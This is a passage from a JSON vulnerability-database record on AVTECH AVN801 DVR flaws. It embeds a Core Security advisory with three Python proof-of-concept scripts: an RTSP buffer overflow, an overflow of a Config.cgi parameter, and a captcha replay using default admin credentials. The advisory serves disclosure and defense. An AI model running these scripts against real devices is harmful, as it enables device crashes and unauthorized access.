},
{
"db": "OSVDB",
"id": "96692",
"trust": 2.5
},
{
"db": "BID",
"id": "62033",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006099",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201308-456",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-12744",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20130828 CORE-2013-0726 - AVTECH DVR MULTIPLE VULNERABILITIES",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "122998",
"trust": 0.2
},
{
"db": "EXPLOIT-DB",
"id": "27942",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-81529",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-64982",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12744"
},
{
"db": "VULHUB",
"id": "VHN-64982"
},
{
"db": "BID",
"id": "62033"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006099"
},
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "NVD",
"id": "CVE-2013-4980"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
]
},
"id": "VAR-201403-0123",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12744"
},
{
"db": "VULHUB",
"id": "VHN-64982"
}
],
"trust": 1.3875
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12744"
}
]
},
"last_update_date": "2023-12-18T12:30:46.875000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AVN801",
"trust": 0.8,
"url": "http://www.avtech.com.tw/index.php?option=com_k2\u0026view=item\u0026id=71"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006099"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-64982"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006099"
},
{
"db": "NVD",
"id": "CVE-2013-4980"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities"
},
{
"trust": 2.5,
"url": "http://osvdb.org/96692"
},
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2013/aug/284"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4980"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-4980"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/62033"
},
{
"trust": 0.3,
"url": "http://www.avtech.com.tw/index.php?option=com_k2\u0026view=item\u0026id=71"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4981"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4982"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.avtech.com.tw/index.php?option=com_content\u0026view=article\u0026id=244\u0026itemid=453\u0026lang=en."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4980"
},
{
"trust": 0.1,
"url": "http://www.avtech.com.tw."
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12744"
},
{
"db": "VULHUB",
"id": "VHN-64982"
},
{
"db": "BID",
"id": "62033"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006099"
},
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "NVD",
"id": "CVE-2013-4980"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-12744"
},
{
"db": "VULHUB",
"id": "VHN-64982"
},
{
"db": "BID",
"id": "62033"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006099"
},
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "NVD",
"id": "CVE-2013-4980"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12744"
},
{
"date": "2014-03-03T00:00:00",
"db": "VULHUB",
"id": "VHN-64982"
},
{
"date": "2013-08-28T00:00:00",
"db": "BID",
"id": "62033"
},
{
"date": "2014-03-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006099"
},
{
"date": "2013-08-28T23:44:44",
"db": "PACKETSTORM",
"id": "122998"
},
{
"date": "2014-03-03T16:55:04.117000",
"db": "NVD",
"id": "CVE-2013-4980"
},
{
"date": "2013-08-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12744"
},
{
"date": "2014-03-04T00:00:00",
"db": "VULHUB",
"id": "VHN-64982"
},
{
"date": "2013-08-28T00:00:00",
"db": "BID",
"id": "62033"
},
{
"date": "2014-03-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006099"
},
{
"date": "2014-03-04T16:50:42.720000",
"db": "NVD",
"id": "CVE-2013-4980"
},
{
"date": "2014-03-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AVTECH AVN801 Remote Buffer Overflow Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12744"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201308-456"
}
],
"trust": 0.6
}
}
VAR-201912-1604
Vulnerability from variot - Updated: 2023-12-18 12:30AVTECH AVN801 DVR has a security bypass via the administration login captcha. AVTECH AVN801 DVR Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. AVTECH AVN801 is a digital video recorder product. AVTECH AVN801 has a security restriction bypass vulnerability when running firmware version 1017-1003-1009-1003. A remote attacker can completely bypass captcha protection by sending multiple requests with any hard-coded verification code and matching verification code. AVTECH AVN801 is prone to a security-bypass vulnerability. Successfully exploiting this issue will allow attackers to bypass certain security restrictions and perform unauthorized actions. Advisory Information
Title: AVTECH DVR multiple vulnerabilities Advisory ID: CORE-2013-0726 Advisory URL: http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities Date published: 2013-08-28 Date of last update: 2013-08-28 Vendors contacted: AVTECH Corporation Release mode: User release
- Vulnerability Information
Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper Access Control [CWE-284] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982
- Vulnerability Description
Multiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and potentially other devices sharing the affected firmware) that could allow a remote attacker:
- [CVE-2013-4980] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP packet handler.
- [CVE-2013-4981] To execute arbitrary code without authentication by exploiting a buffer overflow in '/cgi-bin/user/Config.cgi', via a specially crafted HTTP POST request.
-
Vulnerable Packages
. DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked.
- Vendor Information, Solutions and Workarounds
There was no official answer from AVTECH support team after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be:
. Do not expose the DVR to internet unless absolutely necessary. Have at least one proxy filtering the 'SETUP' parameter in RTSP requests. Have at least one proxy filtering the 'Network.SMTP.Receivers' parameter in HTTP requests to '/cgi-bin/user/Config.cgi'.
- Credits
[CVE-2013-4980] was discovered and researched by Anibal Sacco from Core Security Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were discovered and researched by Facundo Pantaleo from Core Security Consulting Team.
- Technical Description / Proof of Concept Code
7.1. Buffer Overflow in RTSP Packet Handler
[CVE-2013-4980] The following Python script sends a specially crafted packet that triggers a buffer overrun condition when handling the RTSP transaction; no authentication is required. As a result, the device crashes and it could possibly lead to a remote code execution.
/----- import socket
HOST = '192.168.1.1'
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
trigger_pkt = "SETUP
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS
RTSP/1.0\r\n"
trigger_pkt += "CSeq: 1\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media
v2010.02.10)\r\n\r\n"
print "[] Sending trigger"
s.sendall(trigger_pkt)
data = s.recv(1024)
print '[] Response:', repr(data), "\r\n"
s.close()
-----/
7.2. Buffer Overflow in config.cgi Parameters
[CVE-2013-4981] The following Python script exploits other buffer overflow condition; no authentication is required. As a result, the device crashes and it would possible lead to a remote code execution.
/----- import httplib
ip = "192.168.1.1" conn = httplib.HTTPConnection(ip) conn.request("POST", "/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1") resp = conn.getresponse() print resp.read() -----/
7.3. As a result, the captcha protection can by completely bypassed.
/----- import httplib
ip = "192.168.1.1" print "Performing captcha replay with hardcoded wrong captcha code and verify code..." conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read() print "Performing several captcha replays with hardcoded right captcha code and verify code..." for i in range(1, 10): conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUF&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read()
-----/
- Report Timeline
. 2013-08-06: Core Security Technologies attempts to contact vendor using the AVTECH official technical support contact page [2]. No reply received. 2013-08-12: Core attempts to contact vendor. 2013-08-20: Core attempts to contact vendor. 2013-08-28: After 3 attempts to contact vendor, the advisory CORE-2013-0726 is released as 'user release'.
- References
[1] http://www.avtech.com.tw. [2] http://www.avtech.com.tw/index.php?option=com_content&view=article&id=244&Itemid=453&lang=en.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/.
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201912-1604",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "avn801 dvr",
"scope": "eq",
"trust": 1.0,
"vendor": "avtech",
"version": "1017-1003-1009-1003"
},
{
"model": "avn801",
"scope": null,
"trust": 0.8,
"vendor": "avtech",
"version": null
},
{
"model": "avn801",
"scope": "eq",
"trust": 0.6,
"vendor": "avtech",
"version": "1017-1003-1009-1003"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12749"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007064"
},
{
"db": "NVD",
"id": "CVE-2013-4982"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:avtech:avn801_dvr_firmware:1017-1003-1009-1003:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:avtech:avn801_dvr:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4982"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Facundo Pantaleo of Core Security",
"sources": [
{
"db": "BID",
"id": "62035"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-458"
}
],
"trust": 0.9
},
"cve": "CVE-2013-4982",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-4982",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2013-12749",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-4982",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-4982",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2013-12749",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12749"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007064"
},
{
"db": "NVD",
"id": "CVE-2013-4982"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AVTECH AVN801 DVR has a security bypass via the administration login captcha. AVTECH AVN801 DVR Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. AVTECH AVN801 is a digital video recorder product. AVTECH AVN801 has a security restriction bypass vulnerability when running firmware version 1017-1003-1009-1003. A remote attacker can completely bypass captcha protection by sending multiple requests with any hard-coded verification code and matching verification code. AVTECH AVN801 is prone to a security-bypass vulnerability. \nSuccessfully exploiting this issue will allow attackers to bypass certain security restrictions and perform unauthorized actions. *Advisory Information*\n\nTitle: AVTECH DVR multiple vulnerabilities\nAdvisory ID: CORE-2013-0726\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities\nDate published: 2013-08-28\nDate of last update: 2013-08-28\nVendors contacted: AVTECH Corporation\nRelease mode: User release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper\nAccess Control [CWE-284]\nImpact: Code execution, Security bypass\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982\n\n\n3. *Vulnerability Description*\n\nMultiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and\npotentially other devices sharing the affected firmware) that could\nallow a remote attacker:\n\n 1. [CVE-2013-4980] To execute arbitrary code without authentication\nby exploiting a buffer overflow in the RTSP packet handler. \n 2. [CVE-2013-4981] To execute arbitrary code without authentication\nby exploiting a buffer overflow in \u0027/cgi-bin/user/Config.cgi\u0027, via a\nspecially crafted HTTP POST request. \n 3. \n\n\n4. *Vulnerable Packages*\n\n . DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked. \n\n\n5. *Vendor Information, Solutions and Workarounds*\n\nThere was no official answer from AVTECH support team after several\nattempts (see [Sec. 8]); contact vendor for further information. Some\nmitigation actions may be:\n\n . Do not expose the DVR to internet unless absolutely necessary. Have at least one proxy filtering the \u0027SETUP\u0027 parameter in RTSP\nrequests. Have at least one proxy filtering the \u0027Network.SMTP.Receivers\u0027\nparameter in HTTP requests to \u0027/cgi-bin/user/Config.cgi\u0027. \n\n\n6. *Credits*\n\n[CVE-2013-4980] was discovered and researched by Anibal Sacco from Core\nSecurity Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were\ndiscovered and researched by Facundo Pantaleo from Core Security\nConsulting Team. \n\n\n7. *Technical Description / Proof of Concept Code*\n\n\n7.1. *Buffer Overflow in RTSP Packet Handler*\n\n[CVE-2013-4980] The following Python script sends a specially crafted\npacket that triggers a buffer overrun condition when handling the RTSP\ntransaction; no authentication is required. As a result, the device\ncrashes and it could possibly lead to a remote code execution. \n\n/-----\nimport socket\n\nHOST = \u0027192.168.1.1\u0027\nPORT = 554 \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\ntrigger_pkt = \"SETUP\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS\nRTSP/1.0\\r\\n\"\ntrigger_pkt += \"CSeq: 1\\r\\n\"\ntrigger_pkt += \"User-Agent: VLC media player (LIVE555 Streaming Media\nv2010.02.10)\\r\\n\\r\\n\"\nprint \"[*] Sending trigger\"\ns.sendall(trigger_pkt)\ndata = s.recv(1024)\nprint \u0027[*] Response:\u0027, repr(data), \"\\r\\n\"\ns.close()\n-----/\n\n\n7.2. *Buffer Overflow in config.cgi Parameters*\n\n[CVE-2013-4981] The following Python script exploits other buffer\noverflow condition; no authentication is required. As a result, the\ndevice crashes and it would possible lead to a remote code execution. \n\n\n/-----\nimport httplib\n\nip = \"192.168.1.1\"\nconn = 